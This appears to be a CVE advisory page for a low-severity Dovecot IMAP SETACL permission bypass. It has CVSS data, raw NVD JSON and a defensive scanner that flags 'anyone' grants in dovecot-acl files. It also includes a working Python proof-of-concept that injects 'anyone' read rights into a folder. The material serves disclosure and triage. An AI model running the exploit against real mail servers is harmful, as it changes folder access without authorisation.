Security Vulnerability Report
CVE-2026-40020 CVSS 3.1 LOW

CVE-2026-40020

Published: 2026-05-12 14:17:04
Last Modified: 2026-05-12 15:08:23

Description

An attacker can use the IMAP SETACL command to inject the anyone permission into a user's dovecot-acl file even if imap_acl_allow_anyone=no. This causes folders to be spammed to all users. The impact is limited to being able to spam folders to other users; no unexpected access is gained. Install the fixed version. No publicly available exploits are known.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available from NVD (record status: Undergoing Analysis).

Dovecot (see the vendor security advisory for the affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# Exploit Title: Dovecot IMAP SETACL Permission Bypass (CVE-2026-40020)
# Description: Inject the 'anyone' right into a user's dovecot-acl file even
# though imap_acl_allow_anyone=no is set. The folder then becomes visible to
# every user on the server (spam to all users); no extra access is gained.
# Note: this script follows the CVE description only; the record itself states
# that no public exploit is known.
import imaplib

IMAP_SERVER = 'target.example.com'
IMAP_PORT = 143
ATTACKER_USER = '[email protected]'   # any low-privileged mailbox account
ATTACKER_PASS = 'password'
TARGET_FOLDER = 'INBOX.SpamFolder'  # a folder the attacker owns or may administer

def run():
    try:
        # 1. Connect to the IMAP server (plain IMAP; use imaplib.IMAP4_SSL for 993)
        client = imaplib.IMAP4(IMAP_SERVER, IMAP_PORT)

        # 2. Login as the low-privileged user
        client.login(ATTACKER_USER, ATTACKER_PASS)
        print(f"[*] Logged in as {ATTACKER_USER}")

        # 3. SETACL needs the 'a' (administer) right on the folder. An owner has it
        #    on their own folders; in some setups a shared folder granting 'a' works too.
        #    imaplib does not quote the mailbox name, so a name containing spaces
        #    must be passed already quoted, e.g. '"My Folder"'.

        # 4. Exploit: set rights for 'anyone' with SETACL (RFC 4314).
        #    'lrs' = lookup, read, keep \Seen. A patched server should answer NO
        #    here when imap_acl_allow_anyone=no; a vulnerable one answers OK and
        #    writes 'anyone lrs' into the folder's dovecot-acl file.
        typ, data = client.setacl(TARGET_FOLDER, 'anyone', 'lrs')
        if typ == 'OK':
            print(f"[+] Successfully injected 'anyone' permission into {TARGET_FOLDER}")
            print("[+] The folder is now visible to all users.")
        else:
            print(f"[-] Failed to inject permission. Server response: {data}")

        # 5. Read the ACL back to confirm what the server actually stored
        typ, data = client.getacl(TARGET_FOLDER)
        print(f"[*] GETACL {TARGET_FOLDER}: {typ} {data}")

        client.logout()
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == '__main__':
    run()
```
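The description above says the injected right ends up in the user's dovecot-acl file, so the defender-side check is to look for it on disk. The scanner below is an added example; it is not part of this report or of Dovecot's own tooling. It walks a mail store, parses every dovecot-acl file in Dovecot's vfile format (one `<identifier> <rights>` line per entry, with identifiers such as owner, user=<name>, group=<name>, authenticated, anyone) and reports entries that grant rights to anyone/anonymous. On a server configured with imap_acl_allow_anyone=no, such entries are exactly what this CVE leaves behind. Assumptions not stated on the page: that `#` lines are comments, that `anonymous` is an alias of `anyone`, and that an identifier prefixed with `-` is a negative right (a denial rather than a grant); the sample ACL content is constructed.

```python
#!/usr/bin/env python3
"""Find 'anyone' grants in Dovecot vfile ACLs (dovecot-acl files).

Added example for CVE-2026-40020 triage; not part of this report or of Dovecot.
Assumptions (not stated on the page): vfile lines are "<identifier> <rights>",
'#' lines are comments, 'anonymous' is an alias of 'anyone', and an identifier
prefixed with '-' is a negative right (a denial, not a grant).
"""
import os
import sys
from dataclasses import dataclass
from typing import List

WORLD_IDS = {"anyone", "anonymous"}   # identifiers that expose a folder to every user


@dataclass(frozen=True)
class Entry:
    path: str        # dovecot-acl file the line came from
    line_no: int
    identifier: str  # owner, user=<name>, group=<name>, authenticated, anyone, ...
    rights: str      # RFC 4314 letters, e.g. 'lrs' = lookup, read, keep \Seen


def parse_acl(text: str, path: str = "<memory>") -> List[Entry]:
    """Parse one dovecot-acl file body into Entry objects, skipping blanks and comments."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        rights = parts[1].strip() if len(parts) > 1 else ""
        entries.append(Entry(path, line_no, parts[0], rights))
    return entries


def world_grants(entries: List[Entry]) -> List[Entry]:
    """Entries that grant (not deny) at least one right to anyone/anonymous.

    A '-anyone ...' line is a negative right and is deliberately not reported.
    """
    return [e for e in entries if e.identifier in WORLD_IDS and e.rights]


def scan_mail_store(root: str) -> List[Entry]:
    """Walk a mail store (e.g. /var/vmail) and collect world grants from every dovecot-acl."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "dovecot-acl" not in files:
            continue
        path = os.path.join(dirpath, "dovecot-acl")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings.extend(world_grants(parse_acl(fh.read(), path)))
    return findings


def format_findings(findings: List[Entry]) -> List[str]:
    """One report line per finding; an empty list means nothing was found."""
    return [f"{e.path}:{e.line_no}: {e.identifier} {e.rights}" for e in findings]


# Constructed sample of a user's dovecot-acl after the SETACL described above.
SAMPLE_ACL = """\
# folder shared with bob on purpose
owner lrwstipekxa
user=bob lrs
anyone lrs
-anyone w
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = scan_mail_store(sys.argv[1])          # real run: path to the mail store
    else:
        hits = world_grants(parse_acl(SAMPLE_ACL, "sample/dovecot-acl"))
    for line in format_findings(hits):
        print(line)
    sys.exit(1 if hits else 0)
```

Run it as `python3 scan_acl.py /var/vmail` on the mail store (as a user that can read the maildirs); a non-zero exit means at least one folder is exposed to everyone. Entries created legitimately by an administrator with `doveadm acl` show up too, so compare hits against the list of folders that are meant to be public.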

References

https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json (vendor CSAF advisory, from the CVE record below)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40020",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T14:17:03.687",
    "lastModified": "2026-05-12T15:08:22.857",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Attacker can use the IMAP SETACL command to inject the anyone permission to user's dovecot-acl file even if imap_acl_allow_anyone=no. This causes folders to be spammed to all users. The impact is limited to being able to spam folders to other users, no unexpected access is gained. Install to fixed version. No publicly available exploits are known."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json",
        "source": "[email protected]"
      }
    ]
  }
}
```